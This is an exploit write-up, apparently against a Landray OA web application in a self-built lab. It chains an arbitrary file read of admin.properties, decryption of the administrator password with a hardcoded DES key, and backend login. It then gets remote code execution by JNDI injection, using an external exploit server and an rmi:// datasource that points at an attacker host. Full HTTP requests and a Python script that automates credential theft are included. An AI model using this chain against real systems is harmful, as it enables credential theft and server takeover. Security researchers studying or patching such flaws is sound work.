Lab environment: self-built.

Vulnerable paths:
1. File read
/sys/ui/extend/varkind/custom.jsp
2. RCE
/admin.do
Vulnerability verification:
Read the administrator password configuration file to obtain the encrypted administrator password.

Request:
```http
POST //sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 192.168.1.88:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 90

var=%7B%22body%22%3A%7B%22file%22%3A%22%2FWEB-INF%2FKmssConfig%2Fadmin.properties%22%7D%7D
```
Decrypt the encrypted password to obtain the plaintext password.

The decryption code is integrated into the script below.
Log in to the admin backend with the password:
http://192.168.1.88:8080/admin.do


Download the exploitation tool:
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
Start the exploitation tool on a server so that it listens:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping ldycd7.dnslog.cn" -A 192.168.1.1

Send the exploitation request (with the cookie from the backend login session):
```http
POST /admin.do HTTP/1.1
Host: xx.xx.xx.xx
Cookie: JSESSIONID=011EBEEDF3323F7CFFCB31BF42B48B53
Content-Length: 60
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Origin:
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

method=testDbConn&datasource=rmi://xx.xx.xx.xx:1099/xxxxx
```
The command is executed successfully.

Script to fetch the ciphertext and decrypt it:

```python
import base64
import re
import sys

import requests
from Crypto.Cipher import DES

requests.packages.urllib3.disable_warnings()

# Requests are routed through a local intercepting proxy (e.g. Burp), as in the original script
proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}


class EncryptDate:
    def __init__(self, key):
        self.key = key
        self.length = DES.block_size
        # DES in ECB mode (the original named this attribute "aes", but the cipher is DES)
        self.des = DES.new(self.key, DES.MODE_ECB)
        # Strip PKCS#5 padding: the last byte gives the number of padding bytes
        self.unpad = lambda data: data[0:-ord(data[-1])]

    def pad(self, text):
        count = len(text.encode('utf-8'))
        add = self.length - (count % self.length)
        return text + (chr(add) * add)

    def decrypt(self, decrData):
        print('==========>>密文解密中')
        res = base64.decodebytes(decrData.encode("utf8"))
        # Remove the padding so the printed password contains no trailing control bytes
        msg = self.unpad(self.des.decrypt(res).decode("utf8"))
        print('==========>>解密成功密码为: ' + msg)
        return msg


def Landraypass(url):
    urllist = url + '/sys/ui/extend/varkind/custom.jsp'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "DNT": "1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    # The "var" parameter is JSON; body.file is the server-side path that custom.jsp reads
    data = {"var": "{\"body\":{\"file\":\"/WEB-INF/KmssConfig/admin.properties\"}}"}
    passlist = requests.post(urllist, headers=headers, proxies=proxy, data=data, verify=False)
    print('==========>>正在抓取DES密文')
    # The file content comes back with escaped line breaks, so the value ends at a literal "\r"
    passDes = re.findall(r'(?<=password = )(.*?)(?=\\r)', passlist.text, re.I)
    if len(passDes) == 0:
        print('==========!!:抓取密码失败可进行手动测试确认')
    else:
        passDeslist = passDes[0]
        print('==========>>密文抓取成功: ' + passDeslist)
        cr = EncryptDate(b'kmssAdmi')  # DES key as given in the original script
        cr.decrypt(passDeslist)


if __name__ == '__main__':
    if len(sys.argv) == 2:
        url = sys.argv[1]
        Landraypass(url)
    else:
        print("python3 Landraypass.py http://xx.xx.xx.xx")
```